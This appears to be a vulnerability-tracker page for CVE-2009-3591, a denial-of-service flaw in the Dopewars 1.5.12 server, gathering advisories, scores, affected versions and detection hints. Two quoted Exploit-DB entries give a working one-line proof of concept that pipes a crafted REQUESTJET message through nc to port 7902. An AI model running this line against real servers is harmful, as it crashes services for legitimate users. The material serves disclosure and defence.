CVE-2009-3591
published 2009-10-08CVE-2009-3591: Dopewars 1.5.12 allows remote attackers to cause a denial of service (segmentation fault) via a REQUESTJET message with an invalid location.
PriorityP334medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
52.84%
98.8th percentile
Dopewars 1.5.12 allows remote attackers to cause a denial of service (segmentation fault) via a REQUESTJET message with an invalid location.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ben_webb | dopewars | — | — |
| debian | dopewars | < dopewars 1.5.12-9 (bookworm) | dopewars 1.5.12-9 (bookworm) |
| dopewars | dopewars | >= 0 < 1.5.12-9 | 1.5.12-9 |
| dopewars | dopewars | >= 0 < 1.5.12-9 | 1.5.12-9 |
| dopewars | dopewars | >= 0 < 1.5.12-9 | 1.5.12-9 |
| dopewars | dopewars | >= 0 < 1.5.12-9 | 1.5.12-9 |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect REQUESTJET messages sent to the Dopewars server port (TCP 7902) containing an invalid/out-of-range location value (e.g., location index 65536) which triggers a segmentation fault. ↗
- →Monitor for the ^AV (REQUESTJET) message type on TCP port 7902 with an abnormally large location value (e.g., 65536) as the payload indicator of exploit attempt. ↗
- →A Metasploit auxiliary DoS module exists for this vulnerability; monitor for its use against Dopewars servers. ↗
- ·The vulnerability is specific to Dopewars version 1.5.12; the fix was committed to SVN (pathrev=1033) and is resolved in Debian package version 1.5.12-9. ↗
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:N/A:P
osv5.0MEDIUM
vendor_debian5.0LOW
vendor_redhat5.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-rmqp-6xmv-vxjx: Dopewars 1
ghsa_unreviewed·2022-05-02
CVE-2009-3591 [MEDIUM] CWE-20 GHSA-rmqp-6xmv-vxjx: Dopewars 1
Dopewars 1.5.12 allows remote attackers to cause a denial of service (segmentation fault) via a REQUESTJET message with an invalid location.
OSV
CVE-2009-3591: Dopewars 1
osv·2009-10-08·CVSS 5.0
CVE-2009-3591 [MEDIUM] CVE-2009-3591: Dopewars 1
Dopewars 1.5.12 allows remote attackers to cause a denial of service (segmentation fault) via a REQUESTJET message with an invalid location.
Red Hat
dopewars: DoS via REQUESTJET message with an invalid location
vendor_redhat·2009-10-06·CVSS 5.0
CVE-2009-3591 [MEDIUM] dopewars: DoS via REQUESTJET message with an invalid location
dopewars: DoS via REQUESTJET message with an invalid location
Dopewars 1.5.12 allows remote attackers to cause a denial of service (segmentation fault) via a REQUESTJET message with an invalid location.
Debian
CVE-2009-3591: dopewars - Dopewars 1.5.12 allows remote attackers to cause a denial of service (segmentati...
vendor_debian·2009·CVSS 5.0
CVE-2009-3591 [MEDIUM] CVE-2009-3591: dopewars - Dopewars 1.5.12 allows remote attackers to cause a denial of service (segmentati...
Dopewars 1.5.12 allows remote attackers to cause a denial of service (segmentation fault) via a REQUESTJET message with an invalid location.
Scope: local
bookworm: resolved (fixed in 1.5.12-9)
bullseye: resolved (fixed in 1.5.12-9)
forky: resolved (fixed in 1.5.12-9)
sid: resolved (fixed in 1.5.12-9)
trixie: resolved (fixed in 1.5.12-9)
No detection rules found.
Exploit-DB
Dopewars Server 1.5.12 - 'REQUESTJET' Message Remote Denial of Service
exploitdb·2009-10-15
CVE-2009-3591 Dopewars Server 1.5.12 - 'REQUESTJET' Message Remote Denial of Service
Dopewars Server 1.5.12 - 'REQUESTJET' Message Remote Denial of Service
---
source: https://www.securityfocus.com/bid/36606/info
Dopewars is prone to a denial-of-service vulnerability that affects the server part of the application.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
This issue affects Dopewars 1.5.12; other versions may also be affected.
The following exploit is available:
ruby -e 'print "foo^^Ar1111111\n^^Acfoo\n^AV65536\n"' | nc localhost 7902
Exploit-DB
Dopewars Server 1.5.12 - Denial of Service
exploitdb·2009-10-06
CVE-2009-3591 Dopewars Server 1.5.12 - Denial of Service
Dopewars Server 1.5.12 - Denial of Service
---
## Description ##
The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to a lack of input validation.
## POC ##
ruby -e 'print "foo^^Ar1111111\n^^Acfoo\n^AV65536\n"' | nc localhost 7902
## Fix ##
This issue is resolved in the SVN version of the application.
## Discovered by Doug Prostko
Metasploit
Dopewars Denial of Service
metasploit
Dopewars Denial of Service
Dopewars Denial of Service
The jet command in Dopewars 1.5.12 is vulnerable to a segmentation fault due to a lack of input validation.
http://dopewars.svn.sourceforge.net/viewvc/dopewars/dopewars/trunk/ChangeLog?view=markup&pathrev=1033http://dopewars.svn.sourceforge.net/viewvc/dopewars/dopewars/trunk/src/serverside.c?r1=1023&r2=1033&pathrev=1033http://secunia.com/advisories/36961http://www.securityfocus.com/archive/1/507012/100/0/threadedhttp://www.securityfocus.com/bid/36606http://dopewars.svn.sourceforge.net/viewvc/dopewars/dopewars/trunk/ChangeLog?view=markup&pathrev=1033http://dopewars.svn.sourceforge.net/viewvc/dopewars/dopewars/trunk/src/serverside.c?r1=1023&r2=1033&pathrev=1033http://secunia.com/advisories/36961http://www.securityfocus.com/archive/1/507012/100/0/threadedhttp://www.securityfocus.com/bid/36606
2009-10-08
Published